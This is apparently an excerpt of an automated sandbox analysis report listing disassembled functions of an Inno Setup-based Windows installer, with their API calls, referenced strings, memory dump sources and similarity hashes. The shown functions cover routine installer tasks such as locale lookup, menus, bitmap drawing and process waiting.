                                                                                                                                                                                                                                                                                                                                                                  • API ID: ClassInfoMessageSend
                                                                                                                                                                                                                                                                                                                                                                  • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1455646776-4234151509
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 76a62d5c2b18ddabed1a1f2db415f61daf58d6c828ad3828204ddc2489713d7e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93cc19c1f2ae3cdeb94a735bb7db030fa770b3f4550c722f8e96ab60bc3149ff
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E813C346006059FC720DF69C985AEAB7F2FB09304F1580BAE849E7762D738ED41CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00408728 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale$DefaultSystem
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1044490935-665933166
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bf07bec6589cb82417a29d9109d5e68838e6a5c97ac1b9e4b464d3d1e075229e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c01586f9bbb032a7f0f1a98200a37c80c0f70fbac98b28b944ff8a28395f8419
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55513E24B00108ABD701FBA69E41A9E77A9DB94304F50C07FA541BB3C7DA3DDE05975D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00411704 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 158windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                                                                                                                                                                                                                                                                                                  • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                                                                                                                                                                                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                                                                                                                                                                                                                                                                                                  • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,$?
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2359071979-2308483597
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df95c3f439c97799bb0998fa3429798e8a176efd4e8e18b788060c5868d8049e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b2693d76eb6c03a37913dcbbd37782b63df6b44dbfb9d662716933429e9dd30
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA51F674A00144ABDB10EF6ADC816DA7BF9AF09304B11857BF914E73A6E738DD41CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00454FFC Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 854858120-615399546
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: aaa3fccad9696b9b6bfe68c7e7db975784c1698b69a6a0deee302da45e735cd6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aaa3fccad9696b9b6bfe68c7e7db975784c1698b69a6a0deee302da45e735cd6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041BE73 Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                                                                                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                                                                                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                                                                                                                                                                                                                                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1030595962-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0934d86ca8fb123134a847d885dc0ae0ba41a9d0998c4bba382ea8cf266d8dc0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d40efa9a489d930f0c3474e6c583d61de37ea4c8bf925e82c26674748b1ae5a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0041CEE8 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                                                                                                                                                                                                                                                                                                  • 73E922A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                                                                                                                                                                                                                                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                                                                                                                                                                                                                                                                                                  • 73E98830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Stretch$E98830$A4620BitsE922Mode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4209919087-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba9b00c7f19e374317db92bbaed8cea8fa7d56fa7ee5636777b85d926aa1c199
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00457114 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 00457166
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041EEB4: 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571CD
                                                                                                                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 004571EB
                                                                                                                                                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004571F4
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Message$TextWindow$A5940CurrentDispatchSendThreadTranslate
                                                                                                                                                                                                                                                                                                                                                                  • String ID: [Paused]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1715333840-4230553315
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c251432b2b9717db29caccd575644049c995f8e01b18ed466c2c44b837bc0c04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cc82e29175726c0716c689c1ffa83d11e9869aeff1ced20ba9c80888b84e3111
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c251432b2b9717db29caccd575644049c995f8e01b18ed466c2c44b837bc0c04
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 013196309082489EDB11DBB5EC81FDEBBB8DB49314F5540B7F800E7292D67C9909CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0046B758 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursor.USER32(00000000,0046B897), ref: 0046B814
                                                                                                                                                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B822
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B897), ref: 0046B828
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B832
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B897), ref: 0046B838
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Cursor$LoadSleep
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CheckPassword
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4023313301-1302249611
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 87cc9812f09c28c00cc453431652c7e94549ccc14077da35b47ea6f498850ed3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aec6a0205c5a75bc54f0fc291e1a1f9730d999611bc1887dd1e74dc6007ab6bd
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 87cc9812f09c28c00cc453431652c7e94549ccc14077da35b47ea6f498850ed3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 333164346406049FD711EB69C889F9E7BE4EF49304F5580B6F844DB3A2D778AD40CB99
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00477B88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00477AB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00477F42), ref: 00477BBD
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477C02
                                                                                                                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00477C0C
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477C61
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 00477C4A
                                                                                                                                                                                                                                                                                                                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 00477BF2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 613034392-3771334282
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 65d184c56696bd8d6baefe4a5ac293f093c2dd543b1706e930bc299cdf77f89e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56bd6ace22e6e2035f5031cc9978de37ae905e15686cac3f17074c750df7538a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B131A474B042149ADB11EBB988867EEB6A09F48304F90C47AF548EB392D67C9E41879D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00459AE8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00459BA3
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00459BAE
                                                                                                                                                                                                                                                                                                                                                                  • .NET Framework CreateAssemblyCache function failed, xrefs: 00459BC6
                                                                                                                                                                                                                                                                                                                                                                  • Failed to load .NET Framework DLL "%s", xrefs: 00459B88
                                                                                                                                                                                                                                                                                                                                                                  • Fusion.dll, xrefs: 00459B43
                                                                                                                                                                                                                                                                                                                                                                  • CreateAssemblyCache, xrefs: 00459B9A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
